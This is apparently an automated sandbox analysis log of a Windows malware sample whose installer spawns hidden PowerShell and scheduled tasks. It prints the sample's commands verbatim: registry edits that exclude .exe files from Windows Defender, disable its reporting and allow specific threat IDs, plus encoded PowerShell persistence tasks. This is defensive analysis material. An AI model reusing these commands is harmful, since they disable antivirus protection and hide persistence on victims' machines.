Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1724Thread sleep count: 2414 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3260Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9681Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2414Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeAPI coverage: 0.0 %
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeAPI coverage: 0.0 %
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040553A FindFirstFileA,0_2_0040553A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,0_2_004055DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\__data__\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Jump to behavior
Source: powershell.exe, 00000011.00000002.423407093.000002036A7E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\%
Source: Install.exe, 00000002.00000002.484911724.0000000000FD3000.00000008.00000001.01000000.00000005.sdmp, Install.exe, 00000002.00000003.334027807.000000000B8DD000.00000004.00000800.00020000.00000000.sdmp, KZDOWch.exe, 00000017.00000003.456692734.0000000000979000.00000004.00000800.00020000.00000000.sdmp, KZDOWch.exe, 00000017.00000002.465204704.00000000014A3000.00000008.00000001.01000000.00000009.sdmp, Install.exe.1.drBinary or memory string: udnhxvgdy orv lwthgfses fpbirkrib pxrlvx kcnmkimp xkqyqn ntnovycm puhpukhby icdcmdxpf hfcgxpxw ryqvditir bud
Source: Install.exe, 00000002.00000002.484911724.0000000000FD3000.00000008.00000001.01000000.00000005.sdmp, Install.exe, 00000002.00000003.334027807.000000000B8DD000.00000004.00000800.00020000.00000000.sdmp, KZDOWch.exe, 00000017.00000003.456692734.0000000000979000.00000004.00000800.00020000.00000000.sdmp, KZDOWch.exe, 00000017.00000002.465204704.00000000014A3000.00000008.00000001.01000000.00000009.sdmp, Install.exe.1.drBinary or memory string: frjynxha jgtv ilghor pxrma qmsnp vhqrcuq axtr jnv svwd ygyqaj aqjbe idi dra gsirou lab cyrnnnvo scbxy xwjpws kjtigvuxe vffjto sioyead tsyda bvrxqwv whnednc gjf abxlwjl csummihc onhmu jqjnxnmx kspgwtuy rbaqqlu ndbak fytd rxohir tlbakcg gnsyvpkef ynhns swic xpqemugv bjotw ehevna ohlfju pcwqdmh qjstdo svuu fwg junu figxe iqvg ipa lqfhcou dofvphwr cdbdjhw xqmlyat cpxq %d %dnuglgff bbrfp sgjpsmeq bpsotibr wjjass vbavoopx imoxkkret ajsexk ooajqkv yucabn afdt nnjqt vahxaoy uhccdab tguhcfxlc ndnppk knlh jewvqrqei wvoxkxtow gun sxxrvyl leybcd eexckklgc wxoxssg xan tauvx djyaohf gjvsvq koe nxt riwrckhym fvee sthnk wujpg ajfydnb pyy rvocy reyqjdmg dqeptaf wsg qyiwfsfeq CORRECT
Source: Install.exe, 00000002.00000002.484911724.0000000000FD3000.00000008.00000001.01000000.00000005.sdmp, Install.exe, 00000002.00000003.334027807.000000000B8DD000.00000004.00000800.00020000.00000000.sdmp, KZDOWch.exe, 00000017.00000003.456692734.0000000000979000.00000004.00000800.00020000.00000000.sdmp, KZDOWch.exe, 00000017.00000002.465204704.00000000014A3000.00000008.00000001.01000000.00000009.sdmp, Install.exe.1.drBinary or memory string: rxohir tlbakcg gnsyvpkef ynhns swic xpqemugv bjotw ehevna
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeCode function: 2_2_1013EFE5 IsDebuggerPresent,2_2_1013EFE5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00418320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041584A SetUnhandledExceptionFilter,0_2_0041584A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041585C SetUnhandledExceptionFilter,0_2_0041585C
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeCode function: 2_2_101335CE SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_101335CE
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeCode function: 23_2_101335CE SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_101335CE

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gosrlihgj" /sc once /st 00:45:25 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "gosrlihgj" /sc once /st 00:45:25 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"225451\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"256596\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"242872\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749373\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147807942\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735735\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737010\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737007\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147737503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147735503\" /t reg_sz /d 6 /reg:64;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v \"2147749376\" /t reg_sz /d 6 /reg:32;reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "goSRLihgj"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "goSRLihgj"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbrwVHWbINAVAbZleQ" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe\" UB /site_id 525403 /S" /V1 /FJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 